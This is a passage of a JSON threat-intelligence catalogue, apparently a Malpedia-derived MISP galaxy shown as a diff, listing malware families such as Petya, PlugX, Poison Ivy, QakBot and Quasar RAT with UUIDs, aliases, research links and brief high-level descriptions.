"a2fd9b8a-826d-4df5-9a29-d61a8456d086", - "value": "Penco", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", - "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] - }, - "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", - "value": "PetrWrap", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", - "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", - "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", - 
"https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/" - ] - }, - "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", - "value": "Petya", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ReRol" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", - "https://community.fireeye.com/external/1093" - ] - }, - "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", - "value": "pgift", - "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", - "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", - "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", - "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", - "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", - "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/" - ] - }, - "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", - "value": "Philadephia Ransom", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Trik" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", - "https://www.johannesbader.ch/2016/02/phorpiex/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", - 
"https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" - ] - }, - "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", - "value": "Phorpiex", - "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", - "https://www.snort.org/rule_docs/1-26941" - ] - }, - "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", - "value": "pipcreat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", - "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" - ] - }, - "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", - "value": "pirpi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", - "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", - "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" - ] - }, - "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", - "value": "Pitou", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", - "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/", - "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf" - ] - }, - "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", - "value": "PittyTiger RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Pykbot", - "TBag", - "Bublik" - ], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", - "http://blog.kleissner.org/?p=788", - "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", - "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" - ] - }, - "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", - "value": "Pkybot", - "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" - ] - }, - "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", - "value": "PLAINTEE", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", - "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" - ] - }, - "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", - "value": "playwork", - "description": "" - }, - { - "meta": { - "synonyms": [ - "TSCookie" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", - "http://www.freebuf.com/column/159865.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", - "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", - "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", - "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", - 
"https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" - ] - }, - "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", - "value": "PLEAD", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7" - ] - }, - "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", - "value": "Plexor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", - "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", - "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" - ] - }, - "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", - "value": "Ploutus ATM", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", - "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", - "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" - ] - }, - "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", - "value": "ployx", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Korplug" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", - "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", - "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", - "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", - 
"http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", - "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", - "https://securelist.com/time-of-death-connected-medicine/84315/", - "https://community.rsa.com/thread/185439" - ] - }, - "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", - "value": "PlugX", - "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", - "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" - ] - }, - "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", - "value": "pngdowner", - "description": "" - }, - { - "meta": { - "synonyms": [ - "pivy", - "poisonivy" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", - "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", - "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", - "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", - "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", - "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", - "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", - "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - }, - "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", - "value": "Poison Ivy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", - "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" - ] - }, - "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", - "value": "Polyglot", - "description": "" - }, - { - "meta": { - 
"synonyms": [ - "Siplog", - "Fareit" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", - "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", - "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", - "https://github.com/nyx0/Pony" - ] - }, - "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", - "value": "Pony", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] - }, - "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", - "value": "PoohMilk Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", - "https://twitter.com/malwrhunterteam/status/806595092177965058" - ] - }, - "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", - "value": "Popcorn Time", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" - ] - }, - "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", - "value": "portless", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", - "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" - ] - }, - "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", - "value": "poscardstealer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", - "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" - ] - }, - "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", - "value": "Poweliks Dropper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", - "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - ] - }, - "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", - "value": "PowerDuke", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", - "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" - ] - }, - "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", - "value": "PowerPool", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", - "https://lokalhost.pl/gozi_tree.txt" - ] - }, - "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", - "value": "Powersniff", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", - "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" - ] - }, - "uuid": "606f778a-8b99-4880-8da8-b923651d627b", - "value": "PowerRatankba", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", - 
"https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" - ] - }, - "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", - "value": "prb_backdoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", - "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" - ] - }, - "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", - "value": "Prikorma", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", - "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/", - "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502" - ] - }, - "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", - "value": "Prilex", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", - "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", - "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/", - "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/" - ] - }, - "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", - "value": "PrincessLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", - "https://twitter.com/mesa_matt/status/1035211747957923840" - ] - }, - "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", - "value": "PsiX", - "description": "According to Matthew Mesa, this is a modular bot. 
The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule" - }, - { - "meta": { - "synonyms": [ - "PSS" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", - "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" - ] - }, - "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", - "value": "PC Surveillance System", - "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", - "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" - ] - }, - "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", - "value": "Pteranodon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", - "http://blog.alyac.co.kr/1853", - "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" - ] - }, - "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", - "value": "PubNubRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", - "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" - ] - }, - "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", - "value": "Punkey POS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": 
[], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", - "https://github.com/n1nj4sec/pupy", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" - ] - }, - "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", - "value": "pupy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", - "https://www.secureworks.com/research/pushdo", - "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", - "http://malware-traffic-analysis.net/2017/04/03/index2.html", - "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/" - ] - }, - "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", - "value": "Pushdo", - "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" - ] - }, - "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", - "value": "Putabmow", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", - "value": "PvzOut", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", - "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", - "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html", - "https://twitter.com/physicaldrive0/status/573109512145649664" - ] - }, - "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", - "value": "pwnpos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", - "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", - "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", - "https://www.youtube.com/watch?v=HfSQlC76_s4" - ] - }, - "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", - "value": "Pykspa", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Locky Locker" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", - "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", - "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" - ] - }, - "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", - "value": "PyLocky", - 
"description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" - ] - }, - "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", - "value": "Qaccel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", - "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", - "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", - "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", - "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", - "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/", - "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf" - ] - }, - "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", - "value": "Qadars", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Qbot", - "Pinkslipbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", - "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", - "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", - "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", - "http://contagiodump.blogspot.com/2010/11/template.html", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", - "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" - ] - }, - "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", - "value": 
"QakBot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Tolouge" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" - ] - }, - "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", - "value": "QHost", - "description": "" - }, - { - "meta": { - "synonyms": [ - "qtproject" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" - ] - }, - "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", - "value": "QtBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", - "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground" - ] - }, - "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", - "value": "Quant Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://github.com/quasar/QuasarRAT/tree/master/Client", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", - 
"https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", - "https://twitter.com/malwrhunterteam/status/789153556255342596", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] - }, - "uuid": "05252643-093b-4070-b62f-d5836683a9fa", - "value": "Quasar RAT", - "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", - "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" - ] - }, - "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", - "value": "r980", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", - "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" - ] - }, - "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", - "value": "Radamant", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", - "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" - ] - }, - "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", - "value": "RadRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "brebsd" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", - 
